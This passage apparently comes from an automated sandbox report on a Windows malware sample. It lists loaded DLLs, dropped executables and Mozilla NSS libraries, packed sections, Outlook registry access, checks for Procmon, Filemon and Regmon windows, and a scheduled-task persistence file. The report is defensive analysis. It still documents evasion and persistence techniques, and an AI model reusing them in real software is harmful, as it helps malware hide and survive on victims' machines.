Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 2545664 > 1048576

Source: file.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x22a400

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.360000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Unpacked PE file: 10.2.BAFIEGIECG.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Unpacked PE file: 12.2.explorti.exe.9b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Unpacked PE file: 13.2.explorti.exe.9b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Unpacked PE file: 14.2.explorti.exe.9b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gxzeqrwn:EW;fgoahxou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Unpacked PE file: 15.2.7873c16243.exe.db0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C9B3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,

0_2_6C9B3480

Source: initial sample

Static PE information: section where entry point is pointing to: .data

Source: random[1].exe.14.dr	Static PE information: real checksum: 0x0 should be: 0x2757a8
Source: explorti.exe.10.dr	Static PE information: real checksum: 0x1da419 should be: 0x1e8e59
Source: 7873c16243.exe.14.dr	Static PE information: real checksum: 0x0 should be: 0x2757a8
Source: BAFIEGIECG.exe.0.dr	Static PE information: real checksum: 0x1da419 should be: 0x1e8e59
Source: file.exe	Static PE information: real checksum: 0x0 should be: 0x2757a8
Source: amadka[1].exe.0.dr	Static PE information: real checksum: 0x1da419 should be: 0x1e8e59

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name:
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: BAFIEGIECG.exe.0.dr	Static PE information: section name:
Source: BAFIEGIECG.exe.0.dr	Static PE information: section name: .idata
Source: BAFIEGIECG.exe.0.dr	Static PE information: section name:
Source: BAFIEGIECG.exe.0.dr	Static PE information: section name: gxzeqrwn
Source: BAFIEGIECG.exe.0.dr	Static PE information: section name: fgoahxou
Source: BAFIEGIECG.exe.0.dr	Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr	Static PE information: section name:
Source: amadka[1].exe.0.dr	Static PE information: section name: .idata
Source: amadka[1].exe.0.dr	Static PE information: section name:
Source: amadka[1].exe.0.dr	Static PE information: section name: gxzeqrwn
Source: amadka[1].exe.0.dr	Static PE information: section name: fgoahxou
Source: amadka[1].exe.0.dr	Static PE information: section name: .taggant
Source: explorti.exe.10.dr	Static PE information: section name:
Source: explorti.exe.10.dr	Static PE information: section name: .idata
Source: explorti.exe.10.dr	Static PE information: section name:
Source: explorti.exe.10.dr	Static PE information: section name: gxzeqrwn
Source: explorti.exe.10.dr	Static PE information: section name: fgoahxou
Source: explorti.exe.10.dr	Static PE information: section name: .taggant
Source: random[1].exe.14.dr	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name:
Source: 7873c16243.exe.14.dr	Static PE information: section name:
Source: 7873c16243.exe.14.dr	Static PE information: section name:
Source: 7873c16243.exe.14.dr	Static PE information: section name:
Source: 7873c16243.exe.14.dr	Static PE information: section name:
Source: 7873c16243.exe.14.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9EB536 push ecx; ret		0_2_6C9EB549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 14_2_009CD82C push ecx; ret		14_2_009CD83F

Source: file.exe	Static PE information: section name: entropy: 7.995439688368047
Source: file.exe	Static PE information: section name: entropy: 7.9818075029651885
Source: file.exe	Static PE information: section name: entropy: 7.9536686205224
Source: BAFIEGIECG.exe.0.dr	Static PE information: section name: entropy: 7.9833117428475395
Source: BAFIEGIECG.exe.0.dr	Static PE information: section name: gxzeqrwn entropy: 7.954277381174858
Source: amadka[1].exe.0.dr	Static PE information: section name: entropy: 7.9833117428475395
Source: amadka[1].exe.0.dr	Static PE information: section name: gxzeqrwn entropy: 7.954277381174858
Source: explorti.exe.10.dr	Static PE information: section name: entropy: 7.9833117428475395
Source: explorti.exe.10.dr	Static PE information: section name: gxzeqrwn entropy: 7.954277381174858
Source: random[1].exe.14.dr	Static PE information: section name: entropy: 7.995439688368047
Source: random[1].exe.14.dr	Static PE information: section name: entropy: 7.9818075029651885
Source: random[1].exe.14.dr	Static PE information: section name: entropy: 7.9536686205224
Source: 7873c16243.exe.14.dr	Static PE information: section name: entropy: 7.995439688368047
Source: 7873c16243.exe.14.dr	Static PE information: section name: entropy: 7.9818075029651885
Source: 7873c16243.exe.14.dr	Static PE information: section name: entropy: 7.9536686205224

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA155F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_6CA155F0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
